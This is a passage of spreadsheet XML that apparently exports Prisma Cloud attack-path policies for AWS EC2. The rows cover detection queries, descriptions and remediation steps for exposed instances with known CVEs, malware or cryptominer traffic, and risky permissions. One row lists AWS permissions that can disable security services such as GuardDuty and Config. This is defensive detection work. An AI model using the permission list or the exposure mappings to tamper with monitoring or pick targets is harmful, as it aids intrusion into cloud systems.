          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)','AWS EC2 instance with privilege escalation risk permissions') AND with : (Vuln WHERE id IN ('CVE-2023-4863'))</t>
        </is>
      </c>
      <c r="AA1750" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1750" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:01</t>
        </is>
      </c>
      <c r="AC1750" t="inlineStr"/>
      <c r="AD1750" t="b">
        <v>1</v>
      </c>
      <c r="AE1750" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1750" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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0" t="inlineStr">
        <is>
          <t>64231828-6be5-4d58-afd6-e7414b748978</t>
        </is>
      </c>
      <c r="AI1750" t="inlineStr">
        <is>
          <t>8a709920-ab46-4bff-b476-f8d6ced95eb0</t>
        </is>
      </c>
      <c r="AJ1750" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1750" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1751">
      <c r="A1751" t="inlineStr"/>
      <c r="B1751" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1751" s="2" t="inlineStr"/>
      <c r="D1751" t="inlineStr"/>
      <c r="E1751" t="inlineStr"/>
      <c r="F1751" t="inlineStr"/>
      <c r="G1751" t="b">
        <v>1</v>
      </c>
      <c r="H17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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1751" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1751" t="inlineStr">
        <is>
          <t>Remote code execution risk due to publicly exposed and vulnerable AWS EC2 instance (ReportLab, CVE-2023-33733)</t>
        </is>
      </c>
      <c r="L1751" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1751" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1751" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1751" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1751" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1751" t="inlineStr"/>
      <c r="R1751" t="inlineStr"/>
      <c r="S1751" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1751" t="b">
        <v>0</v>
      </c>
      <c r="U1751" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1751" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1751" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instance that are publicly exposed and have known exploitable Remote code execution vulnerability (CVE-2023-33733).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ReportLab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ReportLab (CVE-2023-33733) vulnerability and public exposure reported for the affected AWS EC2 instance as soon as possible.</t>
        </is>
      </c>
      <c r="X175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CVE-2023-33733
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2023-33733</t>
        </is>
      </c>
      <c r="Y1751" t="inlineStr"/>
      <c r="Z1751" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2023-33733'))</t>
        </is>
      </c>
      <c r="AA1751" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1751" t="inlineStr">
        <is>
          <t>2024-03-05 05:47:12</t>
        </is>
      </c>
      <c r="AC1751" t="inlineStr"/>
      <c r="AD1751" t="b">
        <v>1</v>
      </c>
      <c r="AE1751" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1751" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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1" t="inlineStr">
        <is>
          <t>42e10761-4848-403b-b285-87cb14fd648a</t>
        </is>
      </c>
      <c r="AI1751" t="inlineStr">
        <is>
          <t>a100dd1b-745f-4290-b351-74f8b4f4180f</t>
        </is>
      </c>
      <c r="AJ1751" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1751" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1752">
      <c r="A1752" t="inlineStr"/>
      <c r="B1752" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1752" s="2" t="inlineStr"/>
      <c r="D1752" t="n">
        <v>0</v>
      </c>
      <c r="E1752" t="n">
        <v>1</v>
      </c>
      <c r="F1752" t="n">
        <v>0</v>
      </c>
      <c r="G1752" t="b">
        <v>1</v>
      </c>
      <c r="H17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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1752" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1752" t="inlineStr">
        <is>
          <t>Potentially nefarious malware activity detected on a publicly exposed and vulnerable AWS EC2 instance</t>
        </is>
      </c>
      <c r="L1752" t="inlineStr">
        <is>
          <t>RESOURCE_HIJACKING,MALWARE,INTERNET_EXPOSURE,INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M1752" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1752" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1752" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1752" t="inlineStr">
        <is>
          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q1752" t="inlineStr"/>
      <c r="R1752" t="inlineStr"/>
      <c r="S1752" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1752" t="b">
        <v>0</v>
      </c>
      <c r="U1752" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1752" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1752" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances which are publicly exposed with critical or high vulnerabilities and are connected with remote systems known for malware activities.
Malware activity includes activity from viruses, trojans, worms, ransomware, botnet, spambot and other types of malware. Attackers can exploit vulnerabilities on the EC2 instances to compromise the confidentiality, integrity and availability of the affected EC2 instances and perform malicious actions. If network connectivity with remote systems known for malware activity is observed on a publicly exposed and exploitable EC2 instance, it could indicate that the instance is already under attack or has been compromised.
Immediate attention is required to investigate the malware activity, remediate the critical or high vulnerabilities and restrict the public exposure reported for the EC2 instances as soon as possible.</t>
        </is>
      </c>
      <c r="X175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52" t="inlineStr"/>
      <c r="Z1752" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name = (('AWS EC2 instance with network path from the internet (0.0.0.0/0)')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 AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA1752" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1752" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:09</t>
        </is>
      </c>
      <c r="AC1752" t="inlineStr"/>
      <c r="AD1752" t="b">
        <v>1</v>
      </c>
      <c r="AE1752" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1752" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG17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2" t="inlineStr">
        <is>
          <t>a27af685-5cfa-4e47-bf9a-904ecade928e</t>
        </is>
      </c>
      <c r="AI1752" t="inlineStr">
        <is>
          <t>226dc66f-2f67-4aec-a952-6a024c14b43a</t>
        </is>
      </c>
      <c r="AJ1752" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1752" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1753">
      <c r="A1753" t="inlineStr"/>
      <c r="B1753" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1753" s="2" t="inlineStr"/>
      <c r="D1753" t="inlineStr"/>
      <c r="E1753" t="inlineStr"/>
      <c r="F1753" t="inlineStr"/>
      <c r="G1753" t="b">
        <v>1</v>
      </c>
      <c r="H17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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1753" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1753" t="inlineStr">
        <is>
          <t>Potential unauthorized cryptomining activity on AWS EC2 instance affected by malware</t>
        </is>
      </c>
      <c r="L1753" t="inlineStr">
        <is>
          <t>RESOURCE_HIJACKING,MALWARE,INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M1753" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1753" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1753" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1753" t="inlineStr">
        <is>
          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q1753" t="inlineStr"/>
      <c r="R1753" t="inlineStr"/>
      <c r="S1753" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1753" t="b">
        <v>0</v>
      </c>
      <c r="U1753" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1753" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1753" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are affected by malware or grayware and are connected to remote systems known for cryptominer activities.
Cryptominers surreptitiously use a machine's resources to mine cryptocurrencies.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Moreover, If network connectivity with remote systems known for cryptominer activity is observed on an EC2 Instance, it could indicate that the instance is already under attack or has been compromised.
Immediate attention is required to remediate the malware or grayware reported for the instances as soon as possible and required to investigate cryptominer activity for the EC2 Instance as soon as possible.</t>
        </is>
      </c>
      <c r="X1753"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1753" t="inlineStr"/>
      <c r="Z1753" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name = (('Host contains Malware' or 'Host contains Grayware') and ('Traffic from a suspicious IP address associated with Cryptominer activity' or 'Traffic to a suspicious IP address associated with Cryptominer activity'))</t>
        </is>
      </c>
      <c r="AA1753" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1753" t="inlineStr">
        <is>
          <t>2023-12-08 04:25:02</t>
        </is>
      </c>
      <c r="AC1753" t="inlineStr"/>
      <c r="AD1753" t="b">
        <v>1</v>
      </c>
      <c r="AE1753" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1753" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG17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3" t="inlineStr">
        <is>
          <t>4a651011-6a91-4086-847e-42da465310f0</t>
        </is>
      </c>
      <c r="AI1753" t="inlineStr">
        <is>
          <t>cb425a7e-0379-4a1f-9b1f-0e0c60207efa</t>
        </is>
      </c>
      <c r="AJ1753" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1753" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1754">
      <c r="A1754" t="inlineStr"/>
      <c r="B1754" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1754" s="2" t="inlineStr"/>
      <c r="D1754" t="inlineStr"/>
      <c r="E1754" t="inlineStr"/>
      <c r="F1754" t="inlineStr"/>
      <c r="G1754" t="b">
        <v>1</v>
      </c>
      <c r="H17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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1754" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1754" t="inlineStr">
        <is>
          <t>Remote code execution risk due to publicly exposed and vulnerable AWS EC2 instance [ClamAV, CVE-2023-20032]</t>
        </is>
      </c>
      <c r="L1754" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1754" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1754" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1754" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1754" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1754" t="inlineStr"/>
      <c r="R1754" t="inlineStr"/>
      <c r="S1754" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1754" t="b">
        <v>0</v>
      </c>
      <c r="U1754" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1754" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1754" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are publicly exposed and have known exploitable remote code execution vulnerability [CVE-2023-20032].
Remote code execution vulnerability is a critical security concern that enables unauthorized users to execute arbitrary code on a system, potentially leading to data breaches, system compromise, or unauthorized data manipulation. The fact that the EC2 instance is publicly exposed makes it an easy target for an attacker to compromise the affected system. 
Immediate attention is required to remediate the ClamAV [CVE-2023-20032] vulnerability and public exposure reported for the affected AWS EC2 instance as soon as possible</t>
        </is>
      </c>
      <c r="X175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CVE-2023-20032
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2023-20032</t>
        </is>
      </c>
      <c r="Y1754" t="inlineStr"/>
      <c r="Z1754" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2023-20032'))</t>
        </is>
      </c>
      <c r="AA1754" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1754" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:24</t>
        </is>
      </c>
      <c r="AC1754" t="inlineStr"/>
      <c r="AD1754" t="b">
        <v>1</v>
      </c>
      <c r="AE1754" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1754" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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4" t="inlineStr">
        <is>
          <t>63d6c142-f08b-4b45-a2c0-d05ae038873b</t>
        </is>
      </c>
      <c r="AI1754" t="inlineStr">
        <is>
          <t>33ec0502-201d-41b7-95f3-839ff0d97ae6</t>
        </is>
      </c>
      <c r="AJ1754" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1754" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1755">
      <c r="A1755" t="inlineStr"/>
      <c r="B1755" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1755" s="2" t="inlineStr"/>
      <c r="D1755" t="n">
        <v>6</v>
      </c>
      <c r="E1755" t="n">
        <v>0</v>
      </c>
      <c r="F1755" t="n">
        <v>0</v>
      </c>
      <c r="G1755" t="b">
        <v>1</v>
      </c>
      <c r="H17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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1755" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1755" t="inlineStr">
        <is>
          <t>Security Services tampering risk due to a publicly exposed and vulnerable AWS EC2 instance with risky Defense Evasion permissions</t>
        </is>
      </c>
      <c r="L1755" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1755" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1755" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1755" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1755" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1755" t="inlineStr"/>
      <c r="R1755" t="inlineStr"/>
      <c r="S1755" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1755" t="b">
        <v>0</v>
      </c>
      <c r="U1755" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1755" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1755" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are publicly exposed with critical or high vulnerabilities and have Defense Evasion permissions to disable or update security services.
Publicly exposed vulnerable EC2 instances could allow malicious actors to remotely exploit the vulnerability to get initial access to the instance. An Attacker with access to defense Evasion permissions can disable or update security services. This could allow an adversary to modify, delete, or disable crucial security and monitoring features, leaving AWS resources vulnerable to threats, hindering incident investigations, and compromising compliance and configuration tracking.
This policy checks for the following privilege escalation permissions:
'guardduty:UpdateDetector','guardduty:DeleteDetector','guardduty:DeleteMembers','guardduty:UpdateFilter','guardduty:DeleteFilter','shield:DisableApplicationLayerAutomaticResponse','shield:UpdateProtectionGroup','shield:DeleteSubscription','detective:DisassociateMembership','detective:DeleteMembers','inspector:Disable','config:StopConfigurationRecorder','config:DeleteConfigurationRecorder','config:DeleteConfigRule','config:DeleteOrganizationConfigRule','cloudwatch:DisableAlarmActions','cloudwatch:DisableInsightRules'
Immediate attention is required to grant only the minimum privileges required and remove unwanted permissions assigned to the EC2 instance. Remediate critical and high vulnerabilities and restrict public exposure reported for the EC2 instances as soon as possible.</t>
        </is>
      </c>
      <c r="X175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55" t="inlineStr"/>
      <c r="Z1755" t="inlineStr">
        <is>
          <t>asset where asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)','AWS EC2 machine with defense evasion impact of aws security services permissions') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA1755" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1755" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:23</t>
        </is>
      </c>
      <c r="AC1755" t="inlineStr"/>
      <c r="AD1755" t="b">
        <v>1</v>
      </c>
      <c r="AE1755" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1755" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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5" t="inlineStr">
        <is>
          <t>3cfb8ae1-917a-4085-abbb-ab87ab0f8cd5</t>
        </is>
      </c>
      <c r="AI1755" t="inlineStr">
        <is>
          <t>0fd43618-dd55-45ea-a32d-6f8797b5bbac</t>
        </is>
      </c>
      <c r="AJ1755" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1755" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1756">
      <c r="A1756" t="inlineStr"/>
      <c r="B1756" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1756" s="2" t="inlineStr"/>
      <c r="D1756" t="inlineStr"/>
      <c r="E1756" t="inlineStr"/>
      <c r="F1756" t="inlineStr"/>
      <c r="G1756" t="b">
        <v>1</v>
      </c>
      <c r="H17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56" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1756" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1756" t="inlineStr">
        <is>
          <t>Command Injection risk due to publicly exposed AWS EC2 instance with PyTorch vulnerability (Python, CVE-2024-5480)</t>
        </is>
      </c>
      <c r="L1756" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1756" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1756" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1756" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1756" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1756" t="inlineStr"/>
      <c r="R1756" t="inlineStr"/>
      <c r="S1756" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1756" t="b">
        <v>0</v>
      </c>
      <c r="U1756" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1756" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1756" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are publicly exposed and have known exploitable Command injection PyTorch Python vulnerability (CVE-2024-5480).
CVE-2024-5480 is a critical vulnerability in PyTorch's torch.distributed.rpc framework affecting versions before 2.2.2. The vulnerability stems from improper verification of functions called during RPC operations. The flaw occurs when a worker node sends a PythonUDF (User Defined Function) to the master node, which executes it without proper validation.
Successful exploitation of the CVE-2024-5480 vulnerability on the publicly exposed AWS EC2 instance would allow an attacker to execute arbitrary code and compromise master nodes initiating distributed training, potentially resulting in the theft of sensitive AI-related data. This could lead to monetary loss, damage to reputation, and other compliance risks for the organization.
Immediate attention is required to remediate the PyTorch (CVE-2024-5480) vulnerability and public exposure reported for the affected AWS EC2 instance as soon as possible.</t>
        </is>
      </c>
      <c r="X1756" t="inlineStr">
        <is>
          <t>[INTERNET_EXPOSURE]
Restrict Internet exposure of reported EC2 Instances based on your business requirement by modifying Security group rules to the trusted IP address
To modify Security Group rules,
1. Sign in to AWS Console
2. Navigate to EC2 Dashboard
3. Identify the EC2 instances that you want to restrict access to Internet
4. Click on Security Group attached to the instance
5. Update inbound rules that allow Internet access (0.0.0.0/0) to the trusted IP address
   Refer to the following link for detailed steps to modify security group rules,
   https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/working-with-security-groups.html#updating-security-group-rules
NOTE: When modifying Security group rules, make sure that you don't lock yourself out of the instances. Always have a rule that allows you to access them for management purposes.
[VULNERABILITY]
To patch or update the vulnerable software refer to https://nvd.nist.gov/vuln/detail/CVE-2024-5480</t>
        </is>
      </c>
      <c r="Y1756" t="inlineStr"/>
      <c r="Z1756" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2024-5480'))</t>
        </is>
      </c>
      <c r="AA1756" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1756" t="inlineStr">
        <is>
          <t>2024-08-02 06:55:43</t>
        </is>
      </c>
      <c r="AC1756" t="inlineStr"/>
      <c r="AD1756" t="b">
        <v>1</v>
      </c>
      <c r="AE1756" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1756" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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56" t="inlineStr">
        <is>
          <t>1a8d0aae-9df7-4f09-b18b-89f8dbed163e</t>
        </is>
      </c>
      <c r="AI1756" t="inlineStr">
        <is>
          <t>1e0f18cb-b7bd-4254-a4ef-f0b942a5d7b9</t>
        </is>
      </c>
      <c r="AJ1756" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1756" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1757">
      <c r="A1757" t="inlineStr"/>
      <c r="B1757" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1757" s="2" t="inlineStr"/>
      <c r="D1757" t="inlineStr"/>
      <c r="E1757" t="inlineStr"/>
      <c r="F1757" t="inlineStr"/>
      <c r="G1757" t="b">
        <v>1</v>
      </c>
      <c r="H17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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1757" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1757" t="inlineStr">
        <is>
          <t>Sensitive data exposure risk due to publicly exposed and vulnerable AWS EC2 instance (Argo CD, CVE-2022-24348)</t>
        </is>
      </c>
      <c r="L1757" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1757" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1757" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1757" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1757" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1757" t="inlineStr"/>
      <c r="R1757" t="inlineStr"/>
      <c r="S1757" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1757" t="b">
        <v>0</v>
      </c>
      <c r="U1757" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1757" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1757" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instance that are publicly exposed and have known exploitable Sensitive data exposure vulnerability (CVE-2022-24348).
Sensitive data exposure vulnerability would allow an attacker to access sensitive information such as secrets, passwords, and API keys. The fact that the AWS EC2 instance is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Successful exploitation of the Argo CD Sensitive data exposure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Argo CD (CVE-2022-24348) vulnerability and public exposure reported for the affected AWS EC2 instance as soon as possible.</t>
        </is>
      </c>
      <c r="X175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CVE-2022-24348
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2022-24348</t>
        </is>
      </c>
      <c r="Y1757" t="inlineStr"/>
      <c r="Z1757" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2022-24348'))</t>
        </is>
      </c>
      <c r="AA1757" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1757" t="inlineStr">
        <is>
          <t>2024-03-05 05:47:07</t>
        </is>
      </c>
      <c r="AC1757" t="inlineStr"/>
      <c r="AD1757" t="b">
        <v>1</v>
      </c>
      <c r="AE1757" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1757" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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7" t="inlineStr">
        <is>
          <t>f2463f57-a4a6-4957-9bf0-19c1c174cbf9</t>
        </is>
      </c>
      <c r="AI1757" t="inlineStr">
        <is>
          <t>6f710c2f-c948-444e-b776-7e81b1ad11fd</t>
        </is>
      </c>
      <c r="AJ1757" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1757" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1758">
      <c r="A1758" t="inlineStr"/>
      <c r="B1758" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1758" s="2" t="inlineStr"/>
      <c r="D1758" t="n">
        <v>5</v>
      </c>
      <c r="E1758" t="n">
        <v>0</v>
      </c>
      <c r="F1758" t="n">
        <v>0</v>
      </c>
      <c r="G1758" t="b">
        <v>1</v>
      </c>
      <c r="H17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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1758" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1758" t="inlineStr">
        <is>
          <t>Data exfiltration risk due to publicly exposed admin ports on AWS EC2 instance with s3:GetObject and s3:ListBucket permissions</t>
        </is>
      </c>
      <c r="L1758" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1758" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1758" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1758" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1758" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1758" t="inlineStr"/>
      <c r="R1758" t="inlineStr"/>
      <c r="S1758" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1758" t="b">
        <v>0</v>
      </c>
      <c r="U1758" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1758" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1758" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances which are publicly exposed with unrestricted access to admin ports (SSH / RDP) and granted s3:GetObject and s3:ListBucket permissions.
